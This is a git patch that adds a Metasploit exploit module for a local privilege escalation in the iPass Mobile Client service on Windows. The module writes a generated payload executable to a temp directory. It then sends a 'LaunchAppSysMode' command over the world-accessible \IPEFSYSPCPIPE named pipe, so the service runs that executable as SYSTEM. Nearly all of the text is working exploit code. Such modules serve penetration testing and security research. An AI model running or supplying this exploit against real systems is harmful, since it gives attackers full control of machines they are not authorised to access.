From 726f01b8ccd017e072a16ed902c5a46c828e7ed3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Hans-Martin=20M=C3=BCnch=20=28h0ng10=29?= Date: Fri, 13 Mar 2015 20:33:45 +0100 Subject: [PATCH] Initial version --- .../windows/local/ipass_local_privesc.rb | 179 ++++++++++++++++++ 1 file changed, 179 insertions(+) create mode 100644 modules/exploits/windows/local/ipass_local_privesc.rb diff --git a/modules/exploits/windows/local/ipass_local_privesc.rb b/modules/exploits/windows/local/ipass_local_privesc.rb new file mode 100644 index 0000000000..e522ba7a27 --- /dev/null +++ b/modules/exploits/windows/local/ipass_local_privesc.rb @@ -0,0 +1,179 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class Metasploit3 < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Exploit::EXE + include Msf::Post::File + include Msf::Exploit::FileDropper + include Msf::Post::Windows::Priv + include Msf::Post::Windows::Services + + def initialize(info={}) + super(update_info(info, { + 'Name' => 'iPass Mobile Client Service Privilege Escalation', + 'Description' => %q{ + The named pipe, \IPEFSYSPCPIPE, can be accessed by normal users to interact + with the iPass service. The service provides a LaunchAppSysMode command which + allows to execute abitrary commands as SYSTEM. + + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'h0ng10', # Vulnerability discovery, metasploit module + ], + 'Arch' => ARCH_X86, + 'Platform' => 'win', + 'SessionTypes' => [ 'meterpreter' ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread', + }, + 'Targets' => + [ + [ 'Windows', { } ] + ], + 'Payload' => + { + 'Space' => 2048, + 'DisableNops' => true + }, + 'References' => + [ + [ 'URL', 'https://www.mogwaisecurity.de/advisories/MSA-2015-03.txt' ], + ], + 'DisclosureDate' => 'Mar 12 2015', + 'DefaultTarget' => 0 + })) + + register_options([ + OptString.new("WritableDir", [ false, "A directory where we can write files (%TEMP% by default)" ]) + ], self.class) + + end + + def check + os = sysinfo["OS"] + if os =~ /windows/i + svc = service_info 'iPlatformService' + if svc and svc[:display] =~ /iPlatformService/ + vprint_good("Found service '#{svc[:display]}'") + begin + if is_running? + vprint_good("Service is running") + else + vprint_error("Service is not running!") + end + rescue RuntimeError => e + vprint_error("Unable to retrieve service status") + return Exploit::CheckCode::Unknown + end + + vprint_good("Opening named pipe...") + handle = open_named_pipe("\\\\.\\pipe\\IPEFSYSPCPIPE") + + if handle.nil? + fail_with(Failure::NoTarget, "\\\\.\\pipe\\IPEFSYSPCPIPE named pipe not found") + else + vprint_good("\\\\.\\pipe\\IPEFSYSPCPIPE found!") + session.railgun.kernel32.CloseHandle(handle) + end + + return Exploit::CheckCode::Vulnerable + + else + return Exploit::CheckCode::Safe + end + end + end + + + def open_named_pipe(pipe) + invalid_handle_value = 0xFFFFFFFF + + r = session.railgun.kernel32.CreateFileA(pipe, "GENERIC_READ | GENERIC_WRITE", 0x3, nil, "OPEN_EXISTING", "FILE_FLAG_WRITE_THROUGH | FILE_ATTRIBUTE_NORMAL", 0) + handle = r['return'] + + return nil if handle == invalid_handle_value + + return handle + end + + def write_named_pipe(handle, command) + + buffer = Rex::Text.to_unicode(command) + w = client.railgun.kernel32.WriteFile(handle, buffer, buffer.length, 4, nil) + + if w['return'] == false + print_error("The was an error writing to pipe, check permissions") + return nil + end + end + + + def is_running? + begin + status = service_status('iPlatformService') + return (status and status[:state] == 4) + rescue RuntimeError => e + print_error("Unable to retrieve service status") + return false + end + end + + def exploit + if is_system? + fail_with(Exploit::Failure::None, 'Session is already elevated') + end + + handle = open_named_pipe("\\\\.\\pipe\\IPEFSYSPCPIPE") + + if handle.nil? + fail_with(Failure::NoTarget, "\\\\.\\pipe\\IPEFSYSPCPIPE named pipe not found") + else + print_status("Opended \\\\.\\pipe\\IPEFSYSPCPIPE! Proceeding...") + end + + if datastore["WritableDir"] and not datastore["WritableDir"].empty? + temp_dir = datastore["WritableDir"] + else + temp_dir = client.sys.config.getenv('TEMP') + end + + print_status("Using #{temp_dir} to drop malicious exe") + + begin + cd(temp_dir) + rescue Rex::Post::Meterpreter::RequestError + session.railgun.kernel32.CloseHandle(handle) + fail_with(Failure::Config, "Failed to use the #{temp_dir} directory") + end + + print_status("Writing malicious exe to remote filesystem") + write_path = pwd + exe_name = "#{rand_text_alpha(10 + rand(10))}.exe" + + begin + write_file(exe_name, generate_payload_exe) + register_file_for_cleanup("#{write_path}\\#{exe_name}") + rescue Rex::Post::Meterpreter::RequestError + session.railgun.kernel32.CloseHandle(handle) + fail_with(Failure::Config, "Failed to drop payload into #{temp_dir}") + end + + print_status("Sending LauchAppSysMode command") + + begin + write_named_pipe(handle, "iPass.EventsAction.LaunchAppSysMode #{write_path}\\#{exe_name};;;") + rescue Rex::Post::Meterpreter::RequestError + session.railgun.kernel32.CloseHandle(handle) + fail_with(Failure::Config, "Failed to write to pipe") + end + + end + +end